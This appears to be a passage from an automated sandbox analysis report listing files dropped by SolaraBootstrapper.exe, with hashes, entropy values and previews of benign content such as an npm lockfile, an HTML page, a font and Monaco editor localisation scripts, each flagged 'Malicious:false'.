                                                  Entropy (8bit):5.248519595374619
                                                  Encrypted:false
                                                  SSDEEP:384:9VbqQ3uaG5ur6UDR5Gf3QB78K/wR8Cv8mCHL2mW:9QQUurhdUaO8CveXW
                                                  MD5:4759F0455068A7A159E6FEEC8C94B26F
                                                  SHA1:D510F8CE05A9319461B86EF28A9BC998ACF067D3
                                                  SHA-256:E565D94B8DBAAE58AE5C964D797A0870E0AF79FC1A6E13385E568AEEB29E3EF8
                                                  SHA-512:663C9D3313889C3A3AAC2044B3321D235E29169E782B36276ADED4799F19BCC3EB53FA077205A4C96D60844A66A124B70226C9242D912B24938BAA7762EE9264
                                                  Malicious:false
                                                  Preview:{. "name": "fileaccess",. "lockfileVersion": 3,. "requires": true,. "packages": {. "": {. "dependencies": {. "express": "^4.19.2". }. },. "node_modules/accepts": {. "version": "1.3.8",. "resolved": "https://registry.npmjs.org/accepts/-/accepts-1.3.8.tgz",. "integrity": "sha512-PYAthTa2m2VKxuvSD3DPC/Gy+U+sOA1LAuT8mkmRuvw+NACSaeXEQ+NHcVF7rONl6qcaxV3Uuemwawk+7+SJLw==",. "dependencies": {. "mime-types": "~2.1.34",. "negotiator": "0.6.3". },. "engines": {. "node": ">= 0.6". }. },. "node_modules/array-flatten": {. "version": "1.1.1",. "resolved": "https://registry.npmjs.org/array-flatten/-/array-flatten-1.1.1.tgz",. "integrity": "sha512-PCVAQswWemu6UdxsDFFX/+gVeYqKAod3D3UVm91jHwynguOwAvYPhx8nNlM++NqRcK6CxxpUafjmhIdKiHibqg==". },. "node_modules/body-parser": {. "version": "1.20.2",. "resolved": "https://registry.npmjs.org/body-parser/-/body-parser-1.20.2.tgz",. "inte
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:JSON data
                                                  Category:dropped
                                                  Size (bytes):53
                                                  Entropy (8bit):3.9429514180702228
                                                  Encrypted:false
                                                  SSDEEP:3:zVQWNwFiXQWAfYYMCn:zVC4gW6YYMC
                                                  MD5:B9F2CA8A50D6D71642DD920C76A851E5
                                                  SHA1:8CA43E514F808364D0EB51E7A595E309A77FDFCE
                                                  SHA-256:F44555AF79DFA01A68AE8325382293FC68CD6C61D1D4EB9B8F7A42C651C51CDE
                                                  SHA-512:81B6352BBABD0BFFBC50BFCD0CD67DC3C2A7D63BDA0BF12421410C0EC8047AF549A4928B5C5C3E89EAD99AA9240BDDB461C618C49287C15D9D4D3A899E8F596A
                                                  Malicious:false
                                                  Preview:{. "dependencies": {. "express": "^4.19.2". }.}.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:HTML document, ASCII text, with very long lines (1204), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):20873
                                                  Entropy (8bit):5.215641981429158
                                                  Encrypted:false
                                                  SSDEEP:384:FihTARA5LmClk2P5VvW4NGthbVBJjVBX+TIrnoamLR7:FihTnlf+lthbVBJ/Ok7oamLR7
                                                  MD5:08D9AC1E35385587B0C3C8A73EA97234
                                                  SHA1:D1DB15B5E97152BE999339D90630F68ED06A6B78
                                                  SHA-256:016CADAA9A8494B15EFEA920A5EA9C02B441E90DBC7C444E73DB3B307F93A741
                                                  SHA-512:8061A5A92F828642EA2FCB319571EFA406ED67A75B4D4DA1AEB3DA96391A72FCDE670E3E52EFEF62D37DDC17F7ECA5AFA0D35AA02BFD1BCADD8E86240CB802A6
                                                  Malicious:false
                                                  Preview:<!DOCTYPE html>....<html lang="en" xmlns="http://www.w3.org/1999/xhtml">....<head>...<link rel="preconnect" href="https://fonts.googleapis.com">...<link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>...<link href="https://fonts.googleapis.com/css2?family=Kanit:ital,wght@0,100;0,200;0,300;0,400;0,500;0,600;0,700;0,800;0,900;1,100;1,200;1,300;1,400;1,500;1,600;1,700;1,800;1,900&display=swap" rel="stylesheet">...<style type="text/css">....html,....body {.....width: 100%;.....height: 100%;.....margin: 0;.....padding: 0;.....overflow: hidden;.....background-color: rgb(7, 5, 8);.........}.......</style>...<style>....#tabcon {.....background-color: rgb(6, 0, 10);....}.....btn_tab {.....border: 1px solid rgb(16, 6, 29);.....background-color: rgb(7, 0, 10);.....border-radius: 2px;.....color: white;.....min-width: 100px;.....text-align: start !important;..........transition: all 0.3s;....}.......btn_tabusing {.....border: 1px solid rgb(20, 11, 32);.....background-color: rgb(7, 5,
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:TrueType Font data, 11 tables, 1st "GSUB", 16 names, Macintosh, type 1 string, codiconRegularcodiconcodiconVersion 1.11codiconThe icon font for Visual Studio Codehttp://fontel
                                                  Category:dropped
                                                  Size (bytes):77400
                                                  Entropy (8bit):6.135011758024483
                                                  Encrypted:false
                                                  SSDEEP:1536:KgrM3RL0IWAUnc3sMKUdrulGAj3epKYhUwzSf0XLZKeK:KgrM3RAdZc8MKUZ6epKA5zSf0PK
                                                  MD5:1ABA5831B7E53D5104D454A91BFFDD6F
                                                  SHA1:9A5E3C389433ADDD5D5A393D7CC28C465219542C
                                                  SHA-256:B3FFC1AF5867D6C901EA05F38EE12F8F8369DB4912A91D56156EE9C85BD47DC3
                                                  SHA-512:161DD28DDD6AA1BF57614FCF46922879C45A3D2422A4A7D8D873367E5F1E6BE3CEDA3A4197CE829E3EBFF699E2E5D7705F57D54E3DECF05411EF40EBE38C6787
                                                  Malicious:false
                                                  Preview:...........0GSUB .%z...8...TOS/27OFi.......`cmap.kB.........glyfE..d..&4....headX..S.......6hhea.[.........$hmtx.)..........loca....."....zmaxp........... name...K...<....post..1...4...#.....,.....,.................................[.._.<....,....|%......|%.........-...................u...............................0.>..DFLT..latn............................liga.................................+.............*...........M............................PfEd...`.#.,.....G.........................,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,..
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text, with very long lines (494)
                                                  Category:dropped
                                                  Size (bytes):869
                                                  Entropy (8bit):5.108454641046411
                                                  Encrypted:false
                                                  SSDEEP:24:hEiDHn43tgb2RsNIQRkVNYcBfPu/j8GVhmnX:h/DHn43tZRsavW/j8GVhmnX
                                                  MD5:2CC7C26DE2C6539D92E48DF01C747212
                                                  SHA1:2F412A8C084F7D4007F597775137ED0F6B30ACA6
                                                  SHA-256:1EA09D107089DC1E8BC0BA408FEFCBDCBF366C697BA216F88DA49330130E0514
                                                  SHA-512:F7D1E655AC538B8179296C4A84F56A8EB37E6B18D44ACED642F46D49377763526AF51B314BFBE36533F97A7A16585820A3B44CB86851AE131A4ADA74FD9CA139
                                                  Malicious:false
                                                  Preview:/*!-----------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * Version: 0.45.0(5e5af013f8d295555a7210df0d5f2cea0bf5dd56). * Released under the MIT license. * https://github.com/microsoft/vscode/blob/main/LICENSE.txt. *-----------------------------------------------------------*/define("vs/base/common/worker/simpleWorker.nls.de",{"vs/base/common/platform":["_"],"vs/editor/common/languages":["Array","Boolescher Wert","Klasse","Konstante","Konstruktor","Enumeration","Enumerationsmember","Ereignis","Feld","Datei","Funktion","Schnittstelle","Schl\xFCssel","Methode","Modul","Namespace","NULL","Zahl","Objekt","Operator","Paket","Eigenschaft","Zeichenfolge","Struktur","Typparameter","Variable","{0} ({1})"]});..//# sourceMappingURL=../../../../../min-maps/vs/base/common/worker/simpleWorker.nls.de.js.map
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text, with very long lines (515)
                                                  Category:dropped
                                                  Size (bytes):890
                                                  Entropy (8bit):5.062413063201018
                                                  Encrypted:false
                                                  SSDEEP:24:hEiDHn43tgb2RsNI1RkV7GgzX4JOmxUBmnk:h/DHn43tZRsaxgzCOmcmnk
                                                  MD5:BE65596CF447F87B15945ADEC9AB6031
                                                  SHA1:23D8A0D0AD6F13B2CB9CD360D4E0731846242219
                                                  SHA-256:56341C7827241A6BF388660A020B45E3F5A191B7DA46F7A9BC30FBCC61FF2EBB
                                                  SHA-512:0B86DF2585D1A9ABCA9A7581D91A77B1FF343A9F4DB2D35CE809C6106DC78BE3A604EF8E27380C57BD82DFD2400BDB66328E96B94435DCD8089F2F4D6F92F971
                                                  Malicious:false
                                                  Preview:/*!-----------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * Version: 0.45.0(5e5af013f8d295555a7210df0d5f2cea0bf5dd56). * Released under the MIT license. * https://github.com/microsoft/vscode/blob/main/LICENSE.txt. *-----------------------------------------------------------*/define("vs/base/common/worker/simpleWorker.nls.es",{"vs/base/common/platform":["_"],"vs/editor/common/languages":["matriz","booleano","clase","constante","constructor","enumeraci\xF3n","miembro de la enumeraci\xF3n","evento","campo","archivo","funci\xF3n","interfaz","clave","m\xE9todo","m\xF3dulo","espacio de nombres","NULL","n\xFAmero","objeto","operador","paquete","propiedad","cadena","estructura","par\xE1metro de tipo","variable","{0} ({1})"]});..//# sourceMappingURL=../../../../../min-maps/vs/base/common/worker/simpleWorker.nls.es.js.map
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text, with very long lines (529)
                                                  Category:dropped
                                                  Size (bytes):904
                                                  Entropy (8bit):5.1032081550705755
                                                  Encrypted:false
                                                  SSDEEP:24:hEiDHn43tgb2RsNIBRkVHuYOFnb9Z8RdLmng:h/DHn43tZRsaWOFb9+RZmng
                                                  MD5:0E0B9D2CD1250EF30F3B462AF8600C3F
                                                  SHA1:3899FCF4CFA7250BBB0A2E943FC288D40A94BF68
                                                  SHA-256:4A3AFC911E223F70F2FFE4FEBD392FFFFF6011607CC9752C4313E951121BC36A
                                                  SHA-512:602747FA05C86AF14E6F11242B0FD2BEF2474CEC77F6CAD2CCA9923BAC9C0389AE5A970C86C89CB6FF83467446C13B401D529780D86425540F5B1839D2F64704
                                                  Malicious:false
                                                  Preview:/*!-----------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * Version: 0.45.0(5e5af013f8d295555a7210df0d5f2cea0bf5dd56). * Released under the MIT license. * https://github.com/microsoft/vscode/blob/main/LICENSE.txt. *-----------------------------------------------------------*/define("vs/base/common/worker/simpleWorker.nls.fr",{"vs/base/common/platform":["_"],"vs/editor/common/languages":["tableau","bool\xE9en","classe","constante","constructeur","\xE9num\xE9ration","membre d'\xE9num\xE9ration","\xE9v\xE9nement","champ","fichier","fonction","interface","cl\xE9","m\xE9thode","module","espace de noms","NULL","nombre","objet","op\xE9rateur","package","propri\xE9t\xE9","cha\xEEne","struct","param\xE8tre de type","variable","{0} ({1})"]});..//# sourceMappingURL=../../../../../min-maps/vs/base/common/worker/simpleWorker.nls.fr.js.map
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text, with very long lines (504)
                                                  Category:dropped
                                                  Size (bytes):879
                                                  Entropy (8bit):4.955498314023185
                                                  Encrypted:false
                                                  SSDEEP:12:UYEiBFNxn43vFgbRf27Rs9vkBu60RkXlJCKmFi+TsnwvHHo3OBMcG2uQ:hEiDHn43tgb2RsNIuxRkVYD8notnuQ
                                                  MD5:40DCEF8A9C3999FFA8B95F6F4F594F38
                                                  SHA1:0C60A08A17B25AC85EF27B06E73F552B5F166669
                                                  SHA-256:74886FF47CB9BA5DCB72E223887BA3FC91B19F9818AEB9CBFC64A56203F22993
                                                  SHA-512:75349033883604DC20A0CE9EA3BDD025915971BC09DEB01D71FF4BDACE16D5CF81AFFC0BA41831D3900CE7E39EC737C6B881D6B04F34BB8AD5F9932E5234518B
                                                  Malicious:false
                                                  Preview:/*!-----------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * Version: 0.45.0(5e5af013f8d295555a7210df0d5f2cea0bf5dd56). * Released under the MIT license. * https://github.com/microsoft/vscode/blob/main/LICENSE.txt. *-----------------------------------------------------------*/define("vs/base/common/worker/simpleWorker.nls.it",{"vs/base/common/platform":["_"],"vs/editor/common/languages":["matrice","valore booleano","classe","costante","costruttore","enumerazione","membro di enumerazione","evento","campo","file","funzione","interfaccia","chiave","metodo","modulo","spazio dei nomi","Null","numero","oggetto","operatore","pacchetto","propriet\xE0","stringa","struct","parametro di tipo","variabile","{0} ({1})"]});..//# sourceMappingURL=../../../../../min-maps/vs/base/common/worker/simpleWorker.nls.it.js.map
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text, with very long lines (892)
                                                  Category:dropped
                                                  Size (bytes):1267
                                                  Entropy (8bit):5.152311411434772
                                                  Encrypted:false
                                                  SSDEEP:24:hEiDHn43tgb2RsNIvKRkVcJ3AiXqzCoWS2vlBD1bfItvkPbmbsPFr8mIqm7n1:h/DHn43tZRsav2J3AlGoWS2vlzbfCvku
                                                  MD5:621F9BAECCD7C53C86593A0AB55EAC65
                                                  SHA1:9499604D5FC342A0DD505B7C661FC3304A5CAC67
                                                  SHA-256:04B190DB7BC19AF7DD6D28069B0A8FBB2BAEEDCDBEAD5356773444049EB2E524
                                                  SHA-512:7F1737822AB9F2E4216A0488F40D59D48FCDFA4C709140FF16E7ACCB6A4DA3E9BFA2B18533C731E38F570A9C0F1F71C64682FAD0A6076B9DF5C15FEBB4216791
                                                  Malicious:false
                                                  Preview:/*!-----------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * Version: 0.45.0(5e5af013f8d295555a7210df0d5f2cea0bf5dd56). * Released under the MIT license. * https://github.com/microsoft/vscode/blob/main/LICENSE.txt. *-----------------------------------------------------------*/define("vs/base/common/worker/simpleWorker.nls.ja",{"vs/base/common/platform":["_"],"vs/editor/common/languages":["\u914D\u5217","\u30D6\u30FC\u30EB\u5024","\u30AF\u30E9\u30B9","\u5B9A\u6570","\u30B3\u30F3\u30B9\u30C8\u30E9\u30AF\u30BF\u30FC","\u5217\u6319\u578B","\u5217\u6319\u578B\u30E1\u30F3\u30D0\u30FC","\u30A4\u30D9\u30F3\u30C8","\u30D5\u30A3\u30FC\u30EB\u30C9","\u30D5\u30A1\u30A4\u30EB","\u95A2\u6570","\u30A4\u30F3\u30BF\u30FC\u30D5\u30A7\u30A4\u30B9","\u30AD\u30FC","\u30E1\u30BD\u30C3\u30C9","\u30E2\u30B8\u30E5\u30FC\u30EB","\u540D\u524D\u7A7A\u9593","NULL","\u6570\u5024","\u30AA\u30D6\u30B8\u30A7\u30AF\u30C8","\u6F14\u7B97\u5B50","\u30D1\u30
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text, with very long lines (460)
                                                  Category:dropped
                                                  Size (bytes):832
                                                  Entropy (8bit):4.947854490178491
                                                  Encrypted:false
                                                  SSDEEP:12:UYEiBFNxn43vFgbRf27Rs9vkBq0RkXlwhXeXlhryAul948/paec5emG2g:hEiDHn43tgb2RsNIBRkVWXe3rpuISmng
                                                  MD5:B726874AD2F46BA88F950832850542B4
                                                  SHA1:C813DFB6185D59B00AAFE2A98C7632AE67DE6A2F
                                                  SHA-256:A7B212E2CD848787A8AF48FC99C5CE82DEE49A8534DE42FF4833024E93CA4D19
                                                  SHA-512:633DD4C826E485F21F81A6B57DC50810ABBD8072C58F540715207406A667DF8C7EC074CAF64CCC8E3867DD1BBC9AE8D67F3F6837B51BD6FB1FE7104A3CCA417C
                                                  Malicious:false
                                                  Preview:/*!-----------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * Version: 0.45.0(5e5af013f8d295555a7210df0d5f2cea0bf5dd56). * Released under the MIT license. * https://github.com/microsoft/vscode/blob/main/LICENSE.txt. *-----------------------------------------------------------*/define("vs/base/common/worker/simpleWorker.nls",{"vs/base/common/platform":["_"],"vs/editor/common/languages":["array","boolean","class","constant","constructor","enumeration","enumeration member","event","field","file","function","interface","key","method","module","namespace","null","number","object","operator","package","property","string","struct","type parameter","variable","{0} ({1})"]});..//# sourceMappingURL=../../../../../min-maps/vs/base/common/worker/simpleWorker.nls.js.map
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text, with very long lines (708)
                                                  Category:dropped
                                                  Size (bytes):1083
                                                  Entropy (8bit):5.2418019682548636
                                                  Encrypted:false
                                                  SSDEEP:24:hEiDHn43tgb2RsNITPRkV+MUFk45k/ulZKAqof7G50nO:h/DHn43tZRsaTrazYRq6KWnO
                                                  MD5:18F7182628293BA344943946CD60581B
                                                  SHA1:2661B387ADDBF8FAA2AF333F303CC4940AB4B9C0
                                                  SHA-256:377F5295DF6A60B920589743362FA6400E1EC8825BCD0A11D19FE873D6AAEF98
                                                  SHA-512:CFDDB18DA41643B6ED3EC22208CEC3D8CC451302BF23E5224B6C9B3F40F4F6E3B03BDC8969CF7AD9D1DCF53175AE4D8E2040472DC28A0F851D845BDB6ABAC329
                                                  Malicious:false
                                                  Preview:/*!-----------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * Version: 0.45.0(5e5af013f8d295555a7210df0d5f2cea0bf5dd56). * Released under the MIT license. * https://github.com/microsoft/vscode/blob/main/LICENSE.txt. *-----------------------------------------------------------*/define("vs/base/common/worker/simpleWorker.nls.ko",{"vs/base/common/platform":["_"],"vs/editor/common/languages":["\uBC30\uC5F4","\uBD80\uC6B8","\uD074\uB798\uC2A4","\uC0C1\uC218","\uC0DD\uC131\uC790","\uC5F4\uAC70\uD615","\uC5F4\uAC70\uD615 \uBA64\uBC84","\uC774\uBCA4\uD2B8","\uD544\uB4DC","\uD30C\uC77C","\uD568\uC218","\uC778\uD130\uD398\uC774\uC2A4","\uD0A4","\uBA54\uC11C\uB4DC","\uBAA8\uB4C8","\uB124\uC784\uC2A4\uD398\uC774\uC2A4","Null","\uC22B\uC790","\uAC1C\uCCB4","\uC5F0\uC0B0\uC790","\uD328\uD0A4\uC9C0","\uC18D\uC131","\uBB38\uC790\uC5F4","\uAD6C\uC870\uCCB4","\uD615\uC2DD \uB9E4\uAC1C \uBCC0\uC218","\uBCC0\uC218","{0}({1})"]});..//# source
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text, with very long lines (1544)
                                                  Category:dropped
                                                  Size (bytes):1919
                                                  Entropy (8bit):4.476836409761143
                                                  Encrypted:false
                                                  SSDEEP:48:h/DHn43tZRsa2566RQNT4ZQkQMoyXZQMo9UraDM9YrQR/yqQnQLXSHpQmQcdQHQA:h/DHnYRsa2GMnvZU8/DaAuJzSMuT9XnJ
                                                  MD5:771D91548299FD6A6276E4F7B53E3644
                                                  SHA1:88609ED1327F9A196489FD6325F64C2ECACDF427
                                                  SHA-256:715D1A916BB311FFB62B9114B186D86214C70CE8720589D894859102D002FB37
                                                  SHA-512:200E78A5864A4DD91144E3F0DCD2B118BBC7ABB344A87A6D704D427A51122C2D062026C13DB2B02BD5B5BE4CCAD1DB8AD5B79C2969B236A68BA48F0D65CB45D3
                                                  Malicious:false
                                                  Preview:/*!-----------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * Version: 0.45.0(5e5af013f8d295555a7210df0d5f2cea0bf5dd56). * Released under the MIT license. * https://github.com/microsoft/vscode/blob/main/LICENSE.txt. *-----------------------------------------------------------*/define("vs/base/common/worker/simpleWorker.nls.ru",{"vs/base/common/platform":["_"],"vs/editor/common/languages":["\u043C\u0430\u0441\u0441\u0438\u0432","\u043B\u043E\u0433\u0438\u0447\u0435\u0441\u043A\u043E\u0435 \u0437\u043D\u0430\u0447\u0435\u043D\u0438\u0435","\u043A\u043B\u0430\u0441\u0441","\u043A\u043E\u043D\u0441\u0442\u0430\u043D\u0442\u0430","\u043A\u043E\u043D\u0441\u0442\u0440\u0443\u043A\u0442\u043E\u0440","\u043F\u0435\u0440\u0435\u0447\u0438\u0441\u043B\u0435\u043D\u0438\u0435","\u044D\u043B\u0435\u043C\u0435\u043D\u0442 \u043F\u0435\u0440\u0435\u0447\u0438\u0441\u043B\u0435\u043D\u0438\u044F","\u0441\u043E\u0431\u044B\u0442\u0438\u0
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text, with very long lines (625)
                                                  Category:dropped
                                                  Size (bytes):1003
                                                  Entropy (8bit):5.2841309877158515
                                                  Encrypted:false
                                                  SSDEEP:24:hEiDHn43tgb2RsNIPRkVV+obSO9LlO2UTt0fnK:h/DHn43tZRsa/oGO9LlO2wsnK
                                                  MD5:303BB444DA372ADFD2F00711E2F8AF5E
                                                  SHA1:031D648CB39C521E9C314CABF6FED9B4BBFAD5EB
                                                  SHA-256:CECE19CA9DB35EB58973A81EC27FC9866759920C2BA789ADA2887A94400F4DE5
                                                  SHA-512:85B672818A2F3D5F7E4A6C996A683710E8BF5470CC0E28886441FE072B5A5933A1339A588346A99A46C9827F494E801CF52A130A25522BA08E97773614A0A5A9
                                                  Malicious:false
                                                  Preview:/*!-----------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * Version: 0.45.0(5e5af013f8d295555a7210df0d5f2cea0bf5dd56). * Released under the MIT license. * https://github.com/microsoft/vscode/blob/main/LICENSE.txt. *-----------------------------------------------------------*/define("vs/base/common/worker/simpleWorker.nls.zh-cn",{"vs/base/common/platform":["_"],"vs/editor/common/languages":["\u6570\u7EC4","\u5E03\u5C14\u503C","\u7C7B","\u5E38\u6570","\u6784\u9020\u51FD\u6570","\u679A\u4E3E","\u679A\u4E3E\u6210\u5458","\u4E8B\u4EF6","\u5B57\u6BB5","\u6587\u4EF6","\u51FD\u6570","\u63A5\u53E3","\u952E","\u65B9\u6CD5","\u6A21\u5757","\u547D\u540D\u7A7A\u95F4","Null","\u6570\u5B57","\u5BF9\u8C61","\u8FD0\u7B97\u7B26","\u5305","\u5C5E\u6027","\u5B57\u7B26\u4E32","\u7ED3\u6784","\u7C7B\u578B\u53C2\u6570","\u53D8\u91CF","{0} ({1})"]});..//# sourceMappingURL=../../../../../min-maps/vs/base/common/worker/simpleWorker.nls.zh-cn.js.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text, with very long lines (643)
                                                  Category:dropped
                                                  Size (bytes):1021
                                                  Entropy (8bit):5.294811824997682
                                                  Encrypted:false
                                                  SSDEEP:24:hEiDHn43tgb2RsNITRkVOdteAIaIE9OAksxgOSO95HyDn6V:h/DHn43tZRsaRdtLH9OXsKOSO95HIn+
                                                  MD5:441B351A58033DF07839A56FE88CB3F4
                                                  SHA1:3DCC6C0BEBD5F503FDD0B856E20E51F3F1A1C151
                                                  SHA-256:6D06A8DE18319120F905B26E564DDA2E2B464359CF565B8BB13154EDC9A30D7E
                                                  SHA-512:624DDEE33681F4A3476B1F19DDCF675B1344A9DE87F2A7442CFAA5CCFB1D8B050BFF7D76442A6CF5C0B5502EE1730F2F8B27BDDB35FC3BFFD19A7191AE5726F5
                                                  Malicious:false
                                                  Preview:/*!-----------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * Version: 0.45.0(5e5af013f8d295555a7210df0d5f2cea0bf5dd56). * Released under the MIT license. * https://github.com/microsoft/vscode/blob/main/LICENSE.txt. *-----------------------------------------------------------*/define("vs/base/common/worker/simpleWorker.nls.zh-tw",{"vs/base/common/platform":["_"],"vs/editor/common/languages":["\u9663\u5217","\u5E03\u6797\u503C","\u985E\u5225","\u5E38\u6578","\u5EFA\u69CB\u51FD\u5F0F","\u5217\u8209","\u5217\u8209\u6210\u54E1","\u4E8B\u4EF6","\u6B04\u4F4D","\u6A94\u6848","\u51FD\u5F0F","\u4ECB\u9762","\u7D22\u5F15\u9375","\u65B9\u6CD5","\u6A21\u7D44","\u547D\u540D\u7A7A\u9593","null","\u6578\u5B57","\u7269\u4EF6","\u904B\u7B97\u5B50","\u5957\u4EF6","\u5C6C\u6027","\u5B57\u4E32","\u7D50\u69CB","\u578B\u5225\u53C3\u6578","\u8B8A\u6578","{0} ({1})"]});..//# sourceMappingURL=../../../../../min-maps/vs/base/common/worker/simpleWo
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text, with very long lines (16336)
                                                  Category:dropped
                                                  Size (bytes):339604
                                                  Entropy (8bit):5.6482831737137555
                                                  Encrypted:false
                                                  SSDEEP:6144:YD1ao/Ewqw8DWG79ynJiqWa6Amja8zgMAQ3GeS:YD1t//qWG79giqWa8ja8zgMA/eS
                                                  MD5:F536916BB8C69485A43D531D4AEE4B2F
                                                  SHA1:4BBF51AC452E609E283FFDB0AA69843232E519E9
                                                  SHA-256:D3ACD18994F2571C2511314D049689D1B2D649BA667EE1F7291EB0750C08494F
                                                  SHA-512:4A3C473ED88B5C91EA041C39FA6B60BE21A061288FB7341548F4C81A193EF1CA8E52D0149BCD0BC6AE9A7439E1A178D6390D06569513736F82F8FB94D6F48B7C
                                                  Malicious:false
                                                  Preview:/*!-----------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * Version: 0.45.0(5e5af013f8d295555a7210df0d5f2cea0bf5dd56). * Released under the MIT license. * https://github.com/microsoft/vscode/blob/main/LICENSE.txt. *-----------------------------------------------------------*/(function(){var J=["require","exports","vs/editor/common/core/range","vs/editor/common/core/offsetRange","vs/editor/common/core/position","vs/base/common/errors","vs/base/common/strings","vs/base/common/arrays","vs/editor/common/diff/defaultLinesDiffComputer/algorithms/diffAlgorithm","vs/base/common/event","vs/editor/common/core/lineRange","vs/base/common/arraysFind","vs/base/common/assert","vs/base/common/lifecycle","vs/base/common/objects","vs/editor/common/diff/defaultLinesDiffComputer/utils","vs/editor/common/diff/rangeMapping","vs/base/common/platform","vs/base/common/uri","vs/nls","vs/base/common/functional","vs/base/common/iterator","vs/base/
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text, with very long lines (14485)
                                                  Category:dropped
                                                  Size (bytes):14986
                                                  Entropy (8bit):4.6391299681112
                                                  Encrypted:false
                                                  SSDEEP:384:GtbFlAVJmdZoL+v0gbDzhckKq9CNWrgfiJ6an:yg/mduY3hcFTNWrgf5an
                                                  MD5:450CEBD6D2B253EA040A441F860CE09E
                                                  SHA1:809FCD6A391CB39EE4B7E45BBA440581D3544E54
                                                  SHA-256:69A2E9C84833412F35627B2681259FAFB5602632C86A002BD819592D5280EC3B
                                                  SHA-512:6A66709479E46566103E5A78E926EA08A7AA60EA845A28DB6D8F97056E54E8D0E988F2EA3C0A81CFDA730A38C011627243C8EF3112238B7434B02E2574473415
                                                  Malicious:false
                                                  Preview:"use strict";/*!-----------------------------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * Version: 0.45.0(5e5af013f8d295555a7210df0d5f2cea0bf5dd56). * Released under the MIT license. * https://github.com/microsoft/monaco-editor/blob/main/LICENSE.txt. *-----------------------------------------------------------------------------*/.define("vs/basic-languages/abap/abap", ["require","require"],(require)=>{.var moduleExports=(()=>{var s=Object.defineProperty;var o=Object.getOwnPropertyDescriptor;var r=Object.getOwnPropertyNames;var c=Object.prototype.hasOwnProperty;var l=(t,e)=>{for(var i in e)s(t,i,{get:e[i],enumerable:!0})},d=(t,e,i,a)=>{if(e&&typeof e=="object"||typeof e=="function")for(let n of r(e))!c.call(t,n)&&n!==i&&s(t,n,{get:()=>e[n],enumerable:!(a=o(e,n))||a.enumerable});return t};var p=t=>d(s({},"__esModule",{value:!0}),t);var g={};l(g,{conf:()=>m,language:()=>u});var m={comments:{lineComment:"*"},brackets:[["["
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text, with very long lines (4274)
                                                  Category:dropped
                                                  Size (bytes):4775
                                                  Entropy (8bit):5.296288322565082
                                                  Encrypted:false
                                                  SSDEEP:96:pQFDHnYRs8hHV//sax+rbV1+/0V1+/mQGkIlIGEuIBV/1cHhb6z7RlwGcXRqp:G9Y3hqA+rTx1KIlIhuABuHs9liXS
                                                  MD5:30C9B6D5E98544EC4C16251577BDED1A
                                                  SHA1:FA08CF3ADEE30BC6C9A6E41355CD37892DE516F8
                                                  SHA-256:E24FD69A21C6193F82FA3194FD3E2902308B1624150124973EF38C98CF0E5397
                                                  SHA-512:ADF050739EE9AA2A0F26EA4CB0DC1754FF7EABF57992F4F6A73D59B878C66DBC821DEA23F589375CDC8BBCDF2F34EEE4BA28BC5C2B1C4EF82A78077B17005A7B
                                                  Malicious:false
